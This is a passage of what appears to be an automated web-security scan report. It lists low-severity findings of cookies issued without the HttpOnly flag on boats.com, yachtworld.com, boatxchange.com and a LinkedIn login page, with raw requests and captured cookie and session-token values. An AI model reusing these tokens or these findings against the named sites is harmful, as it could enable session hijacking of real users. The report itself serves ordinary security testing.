Apache=10.71.0.26.1296157759692870; path=/; expires=Sat, 29-Jan-11 19:49:19 GMT; domain=.boats.com
NAV_ELEMENT=insurance; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
cuid=4919575020154734820; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
SL_Audience=390|Accelerated|593|1|0;Expires=Sat, 26-Jan-13 19:49:19 GMT;Path=/;Domain=.boats.com
SL_UVId=2B10123C94A63B7A;path=/;

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boat-transport/index.jsp HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.2. http://www.boats.com/boat-transport/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.boats.com
Path:	/boat-transport/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
JSESSIONID=b28ILsFYdlAg; path=/
Apache=10.71.0.26.1296157759693449; path=/; expires=Sat, 29-Jan-11 19:49:19 GMT; domain=.boats.com
boats_temp_info=lf:ywlf; domain=.boats.com; path=/
SL_Audience=687|Accelerated|824|1|0;Expires=Sat, 26-Jan-13 19:49:19 GMT;Path=/;Domain=.boats.com
SL_UVId=2B10123C94E2C19A;path=/;

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.3. http://www.boats.com/includes/script_declarations.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.boats.com
Path:	/includes/script_declarations.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
SL_UVId=2B10137914B699B6;path=/;

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.4. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.boatxchange.com
Path:	/pboats/browse/Make/Regulator/search.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=F9EB4170B90548636802CC9D85DA196C.tomcat1; Path=/pboats

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pboats/browse/Make/Regulator/search.html HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.5. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

leo_auth_token="GST:U4lWXkjQ3w6HNUv-nUlaWUIo7h6V_Qw-aOlD2adTz-eYYAWJ39CBGM:1296157780:5c339d93dc107e9f4d21e938ffaf0bab11f63caf"; Version=1; Max-Age=1799; Expires=Thu, 27-Jan-2011 20:19:39 GMT; Path=/
s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.6. http://www.yachtworld.com/boat-loans/finance/help_boatsbank.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boat-loans/finance/help_boatsbank.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=797529CC4CDD1160056CE0F846F79790.boapp05; Path=/boat-loans
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boat-loans/finance/help_boatsbank.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

9.7. http://www.yachtworld.com/boat-loans/finance/rates.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boat-loans/finance/rates.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=9CB6B77DFE1F357C7A15A4F940F2FEA1.boapp05; Path=/boat-loans
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boat-loans/finance/rates.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

9.8. http://www.yachtworld.com/boat-loans/finance/what_to_expect.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boat-loans/finance/what_to_expect.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=734A9D1AB92AC0313D2B6E84A3195F78.boapp05; Path=/boat-loans
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boat-loans/finance/what_to_expect.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

9.9. http://www.yachtworld.com/boat-loans/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boat-loans/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=4C05D03316DAB70E7658F65FBB7FC56F.boapp00; Path=/boat-loans
boats_session_info=locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 20:35:27 GMT; Path=/
boats_session_info=session_uom:126:locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 20:35:27 GMT; Path=/
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boat-loans/index.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

9.10. http://www.yachtworld.com/boat-loans/partner_program.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boat-loans/partner_program.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=92FC41968A40C02FF28D98A966702B9D.boapp05; Path=/boat-loans
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boat-loans/partner_program.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%